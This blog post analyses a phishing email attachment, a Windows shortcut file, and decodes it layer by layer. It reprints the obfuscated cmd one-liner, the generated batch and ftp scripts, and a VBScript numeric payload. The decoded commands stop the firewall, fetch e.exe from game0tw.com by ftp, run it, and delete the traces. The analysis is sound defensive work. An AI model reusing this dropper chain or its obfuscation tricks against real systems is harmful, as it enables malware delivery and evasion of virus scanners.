I received a phishing attack in my mail today. I wouldn't ordinarily have paid any attention, especially as it was attached to a message in Chinese, which I can't read without a dictionary and a grammar book (and not well then). But by chance it appeared to come from someone who has previously written to me in Chinese, and it was short enough that she might plausibly have intended me to puzzle it out. So the unintelligible message raised my suspicions only a little, and I looked at the attachment anyway. (Sure enough, the message turned out to be vague platitudes.)
It took a while for me to figure out that it was a phishing attack, not a virus. It was packaged as a Windows .LNK file — a shortcut — which ran a 245-character command beginning with:
%coMSpEc% /C sET s=o GAm &ECHO %V%%S%E0TW%x%^>K>w&eCHO %v%123^>^>K>>w&
...
Sorry about the StUdLyCaPs — it was apparently written like that to make it look less like code. But what does it do? %comspec%
is usually cmd.exe
, and cmd /c some-command
runs some-command
. In cmd.exe
's language, &
separates multiple commands to be run sequentially. So this is a script embedded in a one-line command. Case-folded and reformatted, it's:
set s=o gam
echo %v%%s%e0tw%x%^>k >w
echo %v%123^>^>k >>w
echo %v%123^>^>k >>w
echo %v%get c c.vbs ^>^>k >>w
echo %v%by ^>^>k >>w
echo %i%p%b%s:k >>w
echo %f%art c.vbs >>w
set b= -
set i=ft
set x=.com
set v=echo
ren w g.bat
set f=st
g.bat
This writes something to w
and then executes it. ^
escapes the following character, and >
and >>
are the same as on Unix, so the contents of w
turn out to be:
%v%o game0tw%x% >k
%v%123 >>k
%v%123 >>k
%v%get c c.vbs >>k
%v%by >>k
%i%p%b%s:k
%f%art c.vbs
Substituting in the variables gives:
echo o game0tw.com >k
echo 123 >>k
echo 123 >>k
echo get c c.vbs >>k
echo by >>k
ftp -s:k
start c.vbs
So it's writing another file and executing it, although in this case the interpreter is ftp
. k
contains:
o game0tw.com
123
123
get c c.vbs
by
The 123
s are a username and password, which ftp
will prompt for. c.vbs
is (as of two hours later) still available; it contains (reformatted):
function o
for i=1 to UBound(s)
h=h&chr(s(i)-232)
next
Set qq = CreateObject("Wscript.Shell")
qq.run h,0
end function
s=array(245,331,341,332,264,279,331,264,342,333,348,264,347,
348,343,344,264,347,336,329,346,333,332,329,331,331,
333,347,347,270,333,331,336,343,264,343,264,335,329,
341,333,280,348,351,278,331,343,341,294,341,278,348,
352,348,270,333,331,336,343,264,281,282,283,294,294,
341,278,348,352,348,270,333,331,336,343,264,281,282,
283,294,294,341,278,348,352,348,270,333,331,336,343,
341,278,348,352,348,270,333,331,336,343,264,330,353,
333,294,294,341,278,348,352,348,270,334,348,344,264,
277,347,290,341,278,348,352,348,270,332,333,340,264,
341,278,348,352,348,270,333,278,333,352,333,270,329,
348,348,346,337,330,264,295,278,350,330,347,264,277,
346,270,332,333,340,264,295,264,295,278,330,329,348,
264,295,278,350,330,347,264,295,278,333,352,333,270,
270,347,348,329,346,348,264,336,348,348,344,290,279,
279,348,351,278,330,337,332,278,353,329,336,343,343,
278,331,343,341,279)
o
Once the array is converted to a string, h
turns out to be another script embedded in a cmd /c
one-liner. This time the commands are:
net stop sharedaccess
echo o game0tw.com >m.txt
echo 123 >>m.txt
echo 123 >>m.txt
echo get e e.exe >>m.txt
echo bye >>m.txt
ftp -s:m.txt
del m.txt
e.exe
attrib ?.vbs -r
del ? ?.bat ?.vbs ?.exe
start http://tw.bid.yahoo.com/
Looks familiar, no? Once again it writes a script for ftp
and fetches and runs a file. Despite being transferred in text mode, e.exe
turns out to be a 52736-byte executable. I won't try to understand it, but I think it's the payload rather than another level of obfuscatory packaging, because it imports a variety of suspicious Win32 functions, including DeviceIoControl
, InsertMenuA
, and UnregisterClassW
. I'm guessing it tries to replace something (part of a browser?) for phishing purposes. There is a suspicious shortage of strings other than the imports, though, which suggests it obfuscates its data internally. (It also calls IsDebuggerPresent
, presumably to inconvenience people who are trying to watch it run.)
But never mind the binary. Count the layers of obfuscatory packaging:
- Embedding a script in a command via
cmd /C ... & ... & ...
(twice)
- StUdLyCaPs to escape case-sensitive code detectors
- Assembling strings out of several pieces
- Generating a script and then running it (four times)
- Representing text as an array of numbers
- Fetching code from elsewhere (twice)
- Fetching a binary in text mode, so ordinary attempts to download it will get a corrupted version.
That's some impressive depth of defense. I'm tempted to dismiss it as a waste of effort, since none of the layers are much trouble by themselves. But it did get past my virus scanner.